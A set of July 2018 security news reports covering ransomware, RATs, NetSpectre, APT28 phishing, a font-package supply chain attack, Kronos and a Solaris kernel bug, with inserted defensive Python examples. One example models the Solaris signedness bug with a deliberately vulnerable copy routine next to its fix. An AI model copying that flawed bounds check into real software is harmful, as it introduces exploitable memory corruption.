“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.

Dutch Court Sentences CoinVault Ransomware Authors to Community Service
28.7.2018 securityweek

Two Dutch men were sentenced on Thursday to 240 hours of community service for creating and using the CoinVault ransomware.

The suspects are brothers, identified by Dutch media as Melvin and Dennis van den B., currently aged 25 and 21, respectively. They were both arrested in 2015 and accused of creating CoinVault, one of the first pieces of file-encrypting ransomware, and its successor, Bitcryptor.

Their trial took place on July 12 and they have now been sentenced to 240 hours of community service, which is the maximum time of community service someone can serve. They have also been ordered to pay restitution to some of their victims.

Prosecutors asked for a three-month prison sentence and nine months suspended in addition to community service. However, the sentence has been reduced due to the fact that the brothers cooperated with the police, including to help victims recover their files, and have not committed any other crimes since their arrest in 2015.

The suspects were accused of hacking into computers and extorting nearly 1,300 individuals. However, Kaspersky Lab, which investigated CoinVault back in 2014 when the threat emerged and helped police identify the hackers, noted that there were actually roughly 14,000 victims worldwide.

A decryption tool for the CoinVault ransomware is available from the NoMoreRansom initiative, but some victims have not been able to recover their files due to some implementation errors that prevented recovery even with the decryption keys.

The cybercriminals were identified by Dutch police after Kaspersky researchers found a first name in the malware code. According to some reports, the CoinVault authors also failed to hide their real IP address on at least one occasion.

“Cybercrime doesn’t pay,” said Kaspersky Lab researcher Jornt van der Wiel, commenting on the case. “If you become a victim of criminal or ransomware activity, keep your files and report the incident to the police. Never pay the ransom and be confident that not only will the decryption tool appear, but also that justice will triumph in regards to the criminals.”

Parasite HTTP RAT Packs Extensive Protection Mechanisms
28.7.2018 securityweek

A newly discovered remote access Trojan (RAT) dubbed Parasite HTTP includes a broad range of protections, including sandbox detection, anti-debugging, anti-emulation, and more, Proofpoint reports.

Dubbed Parasite HTTP, the malware is being advertised on an underground forum and has already been used in an infection campaign. Courtesy of a modular architecture, the malware’s capabilities can be expanded with the addition of new modules after infecting a system.

The threat was recently used in a small email campaign targeting recipients primarily in the information technology, healthcare, and retail industries. The emails contained Microsoft Word attachments with malicious macros designed to download the RAT from a remote site.

Written in C, the tool is advertised as having no dependencies, a small size of around 49Kb, and plugin support. Moreover, its author claims the malware supports dynamic API calls, has encrypted strings, features a secure command and control (C&C) panel written in PHP, can bypass firewalls, and features encrypted communications.

Among other features, the author also advertises a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” Proofpoint says.

In addition to string obfuscation, Parasite HTTP features a sleep routine to delay execution and check for sandboxes or emulation. It first checks if an exception handler has run, then checks “whether between 900ms and two seconds elapsed in response to the routine’s 1 second sleep split into 10ms increments.”

When detecting a sandbox, the malware does not simply exit or throw an error, but attempts to make it more difficult to determine why it crashed. The RAT also uses code from a public repository for sandbox detection.

“Parasite HTTP also contains a bug caused by its manual implementation of a GetProcAddress API that results in the clearing code not executing,” Proofpoint's security researchers warn.

On Windows 7 and newer versions, the threat resolves critical APIs for creating its registry values. It also uses a process injection technique that isn’t used by major malware families.

The malware includes an obfuscated check for debugger breakpoints within a range of its own code. Parasite HTTP also removes hooks on a series of DLLs, but only restores the first 5 bytes to the original, which would likely result in a crash if a sandbox is using an indirect jump (6 bytes) for its hooks.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint says.

Remote Spectre Attack Allows Data Theft Over Network
28.7.2018 securityweek Attack

A team of researchers from the Graz University of Technology in Austria has demonstrated that Spectre attacks can be launched remotely without the need to execute code on the targeted machine.

The researchers, some of whom were also involved in the discovery of the original Meltdown and Spectre vulnerabilities, have dubbed the new attack NetSpectre as it allows a remote attacker to read arbitrary memory data over the network.

NetSpectre attacks have been successfully conducted by the experts both in a local area network (LAN) and between virtual machines in Google Cloud.

While NetSpectre attacks can in theory pose a significant risk, data can only be leaked very slowly. Researchers achieved an exfiltration rate of 15 bits per hour over a local network, and 60 bits per hour by using a new AVX-based covert channel instead of a cache covert channel. This is the first Spectre attack that does not use a cache covert channel.

In experiments conducted using Google Cloud, researchers managed to leak data from an independent virtual machine at a rate of 3 bits per hour.

The Spectre and Meltdown speculative execution vulnerabilities impact processors from Intel, AMD, ARM and other companies, and they allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data. There are several variants of each flaw, but the original vulnerabilities are Spectre (Variant 1 and Variant 2) and Meltdown (Variant 3).

Exploitation of these flaws has required executing arbitrary code on the targeted system, but NetSpectre, which is related to Variant 1, shows that remote attacks are possible without executing code on the victim’s device.

Researchers also demonstrated that this remote attack method can also be used to break the address-space layout randomization (ASLR) mitigation even if no data is leaked.

Fortunately, NetSpectre attacks can be prevented using the mitigations recommended for the original Spectre. In addition, since this is a network-based attack, network-layer countermeasures can also be effective in blocking it.

“A trivial NetSpectre attack can easily be detected by a DDoS protection, as multiple thousand identical packets are sent from the same source,” researchers explained. “However, an attacker can choose any trade-off between packets per second and leaked bits per second. Thus, the speed at which bits are leaked can simply be reduced below the threshold that the DDoS monitoring can detect. This is true for any monitoring which tries to detect ongoing attacks, e.g., intrusion detection systems. Although the attack is theoretically not prevented, at some point the attack becomes infeasible, as the time required to leak a bit increases drastically.”
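The heuristic the researchers describe, many identical packets from one source, and the trade-off that defeats it, can be seen in a few lines of detection logic. The following is an added illustration written for this page, not code from the Graz team or from any IDS product; the packet log, the request payload, the 1,000-packets-per-second threshold and the addresses are all constructed for the example.

```python
import hashlib
from collections import defaultdict

# Constructed request standing in for the repeated, identical packets a
# NetSpectre-style leak sends: the bytes never change, only the timing does.
PROBE = b"GET /api/lookup?index=4711 HTTP/1.1\r\nHost: victim.test\r\n\r\n"

def make_sample(packets_per_second, seconds, src="198.51.100.7", dst="192.0.2.10"):
    """Build a synthetic packet log of (timestamp_s, src, dst, payload) tuples."""
    step = 1.0 / packets_per_second
    return [(i * step, src, dst, PROBE) for i in range(int(packets_per_second * seconds))]

def detect_repeated_packets(records, window_seconds=1.0, threshold=1000):
    """Return the set of (src, dst, payload-hash) flows in which more than
    `threshold` identical packets fall inside any `window_seconds` window:
    the 'thousands of identical packets from one source' heuristic."""
    by_flow = defaultdict(list)
    for ts, src, dst, payload in records:
        key = (src, dst, hashlib.sha256(payload).hexdigest()[:16])
        by_flow[key].append(ts)
    alerts = set()
    for key, times in by_flow.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it spans at most window_seconds.
            while times[end] - times[start] > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                alerts.add(key)
                break
    return alerts

def max_undetected_rate(window_seconds=1.0, threshold=1000):
    """Packets per second an attacker can send while staying under the threshold.
    Because each leaked bit costs a fixed number of packets, this cap is also a
    ceiling on the leak rate, which is the trade-off the researchers describe."""
    return threshold / window_seconds

def noisy_attack_detected():
    # 5,000 identical packets per second for two seconds trips the detector.
    return len(detect_repeated_packets(make_sample(5000, 2))) > 0

def slow_attack_detected():
    # The same 10,000 packets spread over 20 seconds stay under the threshold.
    return len(detect_repeated_packets(make_sample(500, 20))) > 0

if __name__ == "__main__":
    print("noisy sender flagged:", noisy_attack_detected())
    print("slow sender flagged: ", slow_attack_detected())
    print("undetected ceiling:  ", max_undetected_rate(), "packets/s")
```

The slow sender is not a false negative the detector can fix by tuning: lowering the threshold far enough to catch it would also flag ordinary clients that poll an endpoint, so the practical value of the heuristic is the leak-rate ceiling it imposes, not outright prevention.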

However, experts warned that new methods may be found in the future that bypass current protections and mitigations.

Intel has updated its whitepaper titled “Analyzing potential bounds check bypass vulnerabilities” to include NetSpectre attacks.

Jon Masters, Chief Arm Architect and Computer Microarchitecture Lead at Red Hat, says his company has “not identified any viable userspace spectre gadget attacks but are actively auditing all of the daemons that listen over the network and the rest of the stack.”

Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.


We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.

5:33 PM - Mar 1, 2018 · San Francisco, CA
The social media giant is restricting access to its application programming interfaces (APIs), which allow developers to automate interactions with the platform (i.e. posting tweets).

Spam and abuse are major problems for the platform: every day a large number of bots is used to influence sentiment on specific topics or to spread misinformation or racist content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter is a hard task. Since Tuesday, Twitter has deployed a new application process for developers who intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.” Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service.”


There are, however, many legitimate applications that use the Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.

Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT

The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), which operates under the Russian military intelligence agency GRU, continues to target US politicians.

This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.

The news was reported by The Daily Beast. McCaskill has always been critical of Russia and its aggressive strategy in cyberspace: she has repeatedly accused the Russian Government of “cyber warfare against our democracy,” and has called President Vladimir Putin a “thug” and a “bully.”

Russian cyberspies launched spear-phishing attacks against members of her staff aimed at stealing their credentials, a tactic already used against Hillary Clinton’s campaign manager John Podesta in 2016.

The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.

“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.

“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”


In July, Microsoft helped the US Government in protecting at least three 2018 midterm election candidates from attacks by Russian cyberspies.

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website, it took it down and helped the US government to “avoid anybody being infected by that particular attack.”

“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.

Microsoft sinkholed the website; in this way it was able to track the victims who were redirected to the phishing page.

The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.

Microsoft attributed the attacks to the Russian APT28 group.

McCaskill released a statement confirming that the cyberattack was unsuccessful.

“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.

“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”

Google bans cryptocurrency mining apps from the official Play Store
28.7.2018 securityaffairs Cryptocurrency

Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.
Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.

Following Apple’s decision, announced in June, to ban cryptocurrency mining apps, Google has also updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the device.

“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.

Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.
Mining activities have a dramatic effect on the performance of the device and in some cases could also damage it by causing overheating or destroying the battery.

In December, experts from Kaspersky spotted an Android malware dubbed Loapi that includes such an aggressive mining component that it can destroy the device’s battery.


Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.

Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.

Microsoft revealed details of a supply chain attack at unnamed Maker of PDF Editor
28.7.2018 securityaffairs Attack

Microsoft revealed that hackers attempted to compromise the supply chain of an unnamed maker of PDF software.
The attackers compromised a font package installed by a PDF editor app and used it to spread a crypto-mining malware on victims’ machines.

The attack was discovered by the experts from Microsoft that received alerts via the Windows Defender ATP.

Microsoft discovered that attackers compromised the cloud server infrastructure of a software company that provides font packages for other software firms.

The packages are distributed as MSI files and experts revealed that one of the companies using these packages was the firm that developed the PDF editor application.

The compromise lasted from January to March 2018. According to the tech giant, the hackers compromised only a small number of machines, which could indicate that the hacked companies working with the font package provider have a small market share.

This is a multi-tier attack in which the attackers compromised the supply chain of the supply chain.

“A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case.” reads the analysis published by Microsoft.

“Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the app’s legitimate installer the unsuspecting carrier of a malicious payload.”


The hackers cloned the infrastructure of the software partner that supplies the font packages to the PDF editor vendor: they set up a server containing all of its MSI files, including the font packages, all clean and digitally signed.

The hackers then poisoned the MSI file of an Asian fonts pack with a crypto miner and devised a technique to make the PDF editor download the font packages from the attackers’ server.

Once the victims have installed the PDF editor app, the application will install the font packages from the cloned server managed by the attackers, including the tainted one.

Below is the multi-tier attack as described by Microsoft:

Attackers recreated the software partner’s infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font package, all clean and digitally signed, in the replica server.
The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. With this package tampered with, it is no longer trusted and signed.
Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers’ replica server instead of the software partner’s server.
The attackers targeted the supply chain and hid the miner in an installer so that it would run with full elevated privileges (SYSTEM) on the machine.
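Two controls would have stopped the chain Microsoft describes at the installer: refusing a download parameter that does not point at the pinned partner host, and refusing a package whose contents no longer match what the installer was built to expect. The following is an added example written for this page, not the PDF vendor’s or Microsoft’s code. A SHA-256 manifest stands in for Authenticode signature checking (which needs platform APIs); the host names, package bytes and manifest are all constructed.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed: package hosts the installer may fetch from, pinned at build time.
ALLOWED_PACKAGE_HOSTS = {"packages.example-fontvendor.test"}

# Constructed stand-ins for two MSI files: the clean font pack and a copy with
# a payload appended, the way the tampered Asian fonts pack was modified.
CLEAN_FONT_PACK = b"MSI\x00 asian-fonts 1.0 [font data]"
TAMPERED_FONT_PACK = CLEAN_FONT_PACK + b"\n[appended coin-miner payload]"

# Constructed manifest shipped inside the signed main installer: name -> expected SHA-256.
MANIFEST = {"asian-fonts.msi": hashlib.sha256(CLEAN_FONT_PACK).hexdigest()}

def check_download_source(url):
    """Reject any download parameter that does not point at a pinned host over HTTPS."""
    p = urlparse(url)
    if p.scheme != "https":
        return False, "insecure scheme %r" % p.scheme
    if p.hostname not in ALLOWED_PACKAGE_HOSTS:
        return False, "untrusted host %r" % p.hostname
    return True, "host ok"

def verify_package(name, data):
    """Compare the downloaded bytes with the manifest before handing them to the installer."""
    expected = MANIFEST.get(name)
    if expected is None:
        return False, "package %r not in manifest" % name
    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected):
        return False, "hash mismatch: package tampered or substituted"
    return True, "hash ok"

def install_package(url, name, data):
    """Gate both the source and the content; either failure aborts the install."""
    ok, why = check_download_source(url)
    if not ok:
        return "refused", why
    ok, why = verify_package(name, data)
    if not ok:
        return "refused", why
    return "installed", why

if __name__ == "__main__":
    good = "https://packages.example-fontvendor.test/asian-fonts.msi"
    bad = "https://replica.attacker-controlled.test/asian-fonts.msi"
    print(install_package(good, "asian-fonts.msi", CLEAN_FONT_PACK))
    print(install_package(bad, "asian-fonts.msi", CLEAN_FONT_PACK))
    print(install_package(good, "asian-fonts.msi", TAMPERED_FONT_PACK))
```

Note the order: the host check runs before any bytes are trusted, so a hijacked download link is rejected even when the attacker serves the still-clean, still-signed packages, and the content check catches the one package whose signature would no longer validate.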

The crypto-mining malware would create a process named xbox-service.exe that abuses the computational resources of the victims to mine Monero coins.

The malware also tries to modify the Windows hosts file so that the victim’s machine can’t communicate with the update servers of certain PDF apps and security software. The trick would prevent remote cleaning and remediation of affected machines.
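A hosts file edited to cut a machine off from its update servers is easy to spot once you look for it, and the check is worth running from an EDR or a login script. The following is an added example for this page, not Microsoft’s detection logic; the sample hosts file, its domain names and the name-fragment heuristic are constructed.

```python
import ipaddress
import re

# Constructed sample of a Windows hosts file after the kind of tampering described above.
# Domain names are placeholders, not the real vendors' hosts.
SAMPLE_HOSTS = """\
# Comment lines are ignored
127.0.0.1       localhost
::1             localhost
0.0.0.0         update.example-pdfvendor.test
127.0.0.1       definitions.example-av.test
127.0.0.1       www.example-av.test
127.0.0.1       telemetry.example.test
192.0.2.10      intranet.corp.test
"""

SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1", "::"}
LEGITIMATE_LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}
# Name fragments that suggest an update or security-vendor endpoint (assumed heuristic).
SENSITIVE_NAME_PATTERNS = [r"update", r"definitions", r"-av\b", r"security", r"defender", r"antivirus"]

def parse_hosts(text):
    """Return (line_number, address, hostname) for every mapping in a hosts file."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                             # malformed line: not an address
        for name in parts[1:]:
            entries.append((lineno, str(addr), name.lower()))
    return entries

def suspicious_entries(text):
    """Flag names that resolve to a sinkhole address, ranking update/security
    vendors' names above generic ones. Real addresses for intranet names are
    ordinary administration and are left alone."""
    findings = []
    for lineno, addr, name in parse_hosts(text):
        if name in LEGITIMATE_LOOPBACK_NAMES:
            continue
        if addr not in SINKHOLE_ADDRESSES:
            continue
        sensitive = any(re.search(p, name) for p in SENSITIVE_NAME_PATTERNS)
        reason = "update/security host blackholed" if sensitive else "name pointed at loopback"
        findings.append((lineno, addr, name, reason))
    return findings

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print("line %d: %s -> %s (%s)" % finding)
```

On a fleet, the useful signal is the diff against a known-good baseline rather than the absolute list, since some administrators do block telemetry hosts deliberately; entries that silence update or definition servers should page someone regardless.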

Kronos Banking Trojan resurrection, new campaigns spotted in the wild
28.7.2018 securityaffairs

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in recent months.
The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.

The malware was first spotted in 2014 by researchers at security firm Trusteer, who discovered an advertisement on the Russian underground market for a new financial Trojan dubbed Kronos.


The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variants share many similarities with older versions:

Extensive code overlap
Same Windows API hashing technique and hashes
Same string encryption technique
Extensive string overlap
Same C&C encryption mechanism
Same C&C protocol and encryption
Same webinject format (Zeus format)
Similar C&C panel file layout
“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” reads the analysis published by Proofpoint.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

A first campaign was observed on June 27; the malware targeted German users with weaponized documents attached to spam emails. The macros in the documents were used as a downloader for the payload, in some cases via the SmokeLoader downloader.

A second campaign was uncovered on July 13; victims were infected through a malvertising campaign. The malicious ads pointed to a website that, thanks to JavaScript injections, redirected visitors to the RIG exploit kit, which delivered SmokeLoader. The downloader would then deliver Kronos onto the compromised machines.

A third campaign, observed since July 15, saw victims receiving fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan.”

Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs

Security experts discovered a kernel-level privilege escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3.
Security researchers from Trustwave have discovered a new high-severity vulnerability, tracked as CVE-2018-2892, affecting the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by a remote authenticated attacker to execute code with elevated privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The experts noted that the flaw was first discovered in 2007 and was publicly disclosed in 2009 at the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issues and an unbounded memory write.

“The original issue was disclosed on stage at CanSec 2009 ( https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”


Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.
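The two defects Trustwave names, a bounds check that only tests the upper limit of a signed, user-controlled index and a copyin() length the caller controls, are easiest to see side by side with their fix. The following is an added model written for this page, not Solaris AVS code: it does not reproduce the driver, the ioctl or its structures, and the table sizes, entry size and surrounding memory are all constructed. It only shows why a negative index passes a `< MAX` check and what the corrected checks must look like.

```python
import struct

ENTRY_SIZE = 16        # constructed: bytes per table entry
MAX_ENTRIES = 8        # constructed: the only bound the vulnerable check tests
BEFORE = 64            # constructed: unrelated kernel data placed before the table
AFTER = 64             # constructed: unrelated kernel data placed after the table

def kernel_memory():
    """Model of a kernel region: other data, the table, then more other data."""
    return bytearray(b"B" * BEFORE + b"\x00" * (ENTRY_SIZE * MAX_ENTRIES) + b"A" * AFTER)

def parse_index(arg_bytes):
    """Interpret the 4-byte user argument as a signed 32-bit integer, the way a
    signed struct field does: 0xffffffff becomes -1, not 4294967295."""
    return struct.unpack("<i", arg_bytes)[0]

def bounds_check_vulnerable(idx):
    # Only the upper bound is tested, so every negative index passes.
    return idx < MAX_ENTRIES

def bounds_check_fixed(idx):
    # Both bounds, on the signed value the code actually uses.
    return 0 <= idx < MAX_ENTRIES

def ioctl_vulnerable(mem, arg_bytes, user_buf):
    """Signed index, upper bound only, caller-chosen length: a write outside the table."""
    idx = parse_index(arg_bytes)
    if not bounds_check_vulnerable(idx):
        return "rejected"
    dst = BEFORE + idx * ENTRY_SIZE            # negative idx lands before the table
    for i, b in enumerate(user_buf):           # models copyin() with no length limit
        mem[dst + i] = b
    return "copied"

def ioctl_fixed(mem, arg_bytes, user_buf):
    """Same operation with the index range and the copy length both enforced."""
    idx = parse_index(arg_bytes)
    if not bounds_check_fixed(idx):
        return "rejected: index out of range"
    if len(user_buf) > ENTRY_SIZE:
        return "rejected: length exceeds entry size"
    dst = BEFORE + idx * ENTRY_SIZE
    mem[dst:dst + len(user_buf)] = user_buf
    return "copied"

def neighbours_intact(mem):
    """True if nothing outside the table was touched."""
    return mem[:BEFORE] == b"B" * BEFORE and mem[-AFTER:] == b"A" * AFTER

if __name__ == "__main__":
    m = kernel_memory()
    print(ioctl_vulnerable(m, b"\xff\xff\xff\xff", b"X" * 16), neighbours_intact(m))
    m = kernel_memory()
    print(ioctl_fixed(m, b"\xff\xff\xff\xff", b"X" * 16), neighbours_intact(m))
```

The review lesson is that `idx < MAX` is not a bounds check for a signed value; either compare as unsigned or test the lower bound explicitly, and never let the length passed to copyin() exceed the space at the computed destination.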

According to the experts, the flaw is still present in the solution due to the introduction of additional code used for testing purposes.

Oracle addressed this flaw as part of the July CPU security updates.

Ransomware attack disrupted some systems of the shipping giant COSCO in the US
28.7.2018 securityaffairs

The Chinese shipping giant COSCO was reportedly hit by a ransomware-based attack; the attack occurred in the Americas region.
According to COSCO a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack and quoted a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”


The shipping company quickly isolated the affected systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of its fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported that communications between the carrier’s U.S. operations and its customers have been slowed by the cyber attack. Digital communications were disrupted and communications were being carried out by telephone.

JOC.com on Twitter (10:52 PM - Jul 24, 2018): Cosco responds to cyber attack on US operations #maritime #containers http://bit.ly/2uMjJJS

Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

According to the popular security expert Kevin Beaumont, the ransomware has infected the portion of the infrastructure that hosts the company website (cosco-usa.com), phone and email systems, and WAN and VPN gateways.

Catalin Cimpanu · 26 Jul, replying to @GossiTheDog:
Their global website is still working fine. Only their US site is down from what it appears. http://lines.coscoshipping.com/home/News/detail/15325081261286611042/50000000000000231?id=50000000000000231 …

Kevin Beaumont (12:54 AM - Jul 26, 2018):
Yes, it is only Cosco Americas Inc (CAI) impacted. Anything on this network: https://ipinfo.io/AS32604 - includes their website http://www.cosco-usa.com , their phone system, WAN and VPN gateways, email etc.

Kevin Beaumont · 26 Jul, replying to @GossiTheDog:
If anybody from Cosco is reading I help with anything like this free of charge for the insight gained, send me an email if you want.

Kevin Beaumont (9:26 AM - Jul 26, 2018):
Cosco have put out a statement confirming the issue. I understand they’re now on their 4th day of downtime for CAI (Cosco Americas Inc) business unit. https://www.itwire.com/security/83772-cosco-s-us-arm-hit-by-windows-ransomware.html …
Linked article: Cosco's US arm hit by Windows ransomware. The North American arm of Chinese shipping conglomerate Cosco has been hit by Windows ransomware, affecting communications at its US locations.

At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack doesn’t appear as severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

